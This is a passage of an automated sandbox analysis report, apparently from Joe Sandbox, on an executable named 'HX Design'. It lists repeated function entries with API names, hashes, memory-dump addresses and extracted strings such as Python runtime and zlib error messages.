                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                                                                                                      • Opcode ID: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
                                                                                                                                                                                                                                                      • Instruction ID: ef733f37ffa014ac3a68f62e522e984fcfe559d21026ab6700ddab528cfe89e2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b0bfe6dda5be6348f5dea9afb2976fe88cae53a5ed3d6ba0ce225c2e8636390
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6821D321B18652A6FE90BA2279443BAE651FF45BC4FC85930EE0C07786CEBDE04DD324
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                      • Instruction ID: b2268808dcc6895e0fef63df0caa3147cf879b00530e18e2fb3714a2d01f9d31
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F531A422A18652A6F751BB5D884137DAAA0AF80BA0FC10135E96D073D2DFFCE449E731
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                                                                                                      • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                      • Instruction ID: 339ef3e4b319c8126ec87b10ec3bffebb118d60779ba7046f0f0fe3e47245435
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC218D72B0574999EB24AF68C4802BC73A0FB44718F840636D7AC06AC5DFB8D548D750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                      • Instruction ID: 482b3acd5742264b58462f63515813273879aa820c5c5bf9170c4a8ece18edff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F511A531A1C64192FA60BF9994002BDEA60FF85B84FC44435EE8C57AD6CFBDD404E720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                      • Instruction ID: 3ad266e4316c9312677d1b971cfd184646fc60c70f333835db715ea51f52a890
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F213832A08A4597EB60AF18E08037EB3A0FB84B50F954234E7AD476D9DF7CD408DB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                      • Instruction ID: b39856e5f9d064bf5c242c4a17b82f2fc38f4900213d07eb6032335b712e4a18
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F101A561A0874552E904FF5A9A001B9E691FF85FE0F884631DE5C23BD6CEBCD445E310
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                                      • Instruction ID: 9dad20b4ed386c369d777a2caa12f764d1c031a60900902b85ae327d2108ab69
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A01B120E1D68360FEA47B29664117AD190BF44BE0FD44635EA1C83AE6DFFCE459E230
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                      • Instruction ID: a7712a12f328a3f97be2da87f6987047da6d42c5c9d2db9d2581cbeec2ed0727
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85E01260F1C707A7FA553AAC55C217995209FA9341FC04534E9080A2D3EDBC6C5EF631
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,00000000,00007FF73207B32A,?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A), ref: 00007FF73207EBED
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                                      • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                      • Instruction ID: 1f96bf4ecae490a7da1f59737f2ddb23586a8f836cee10f8ee85a6a422130b44
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F06D64B0A206A0FE59776D98513B68AE09F88B80FCC5530CD0F863D2ED9CE489E270
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF732070C90,?,?,?,00007FF7320722FA,?,?,?,?,?,00007FF732073AE9), ref: 00007FF73207D63A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                                      • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                      • Instruction ID: e46a7dc5416d65d3a91827f409b30fa18f877e6dfa75c5d0ca93540f6e0bde42
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CF0F810B09286A5FE647779584167592909F847A0FC80730DD7E862C2EEACA488E630
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065840
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065852
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065889
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206589B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658B4
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658C6
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658DF
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658F1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206590D
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206591F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206593B
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206594D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065969
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206597B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065997
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659A9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659C5
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659D7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                      • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                      • Instruction ID: 87b93f447fe19313d6a700db50923546ab4e02e049bb92a63ebf0194914f9d58
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE22A064A09B07B1FA58FB95A8545B6A2B0FF14B55FD41035C82E42AA0FFFCA54CF234
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                      • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                      • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                                      • Instruction ID: 9c95588c749f896b9c9277a1f419878915b29f69c4036d7198d2caa66872c413
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8B2F372E182929BE774DF64D4407FEB7A1FB54388F801135DA0E57A88DFB8A908DB50
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                      • API String ID: 0-2665694366
                                                                                                                                                                                                                                                      • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                                      • Instruction ID: e816ebfa14e7d099d7c14e60fa6d6f4b5208cc68e7d68a1d8d030d05145d3dd0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3521572B146A69BE7A4AF14C458B7EBBEDFB44340F414139E64A93780DBBCD808DB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
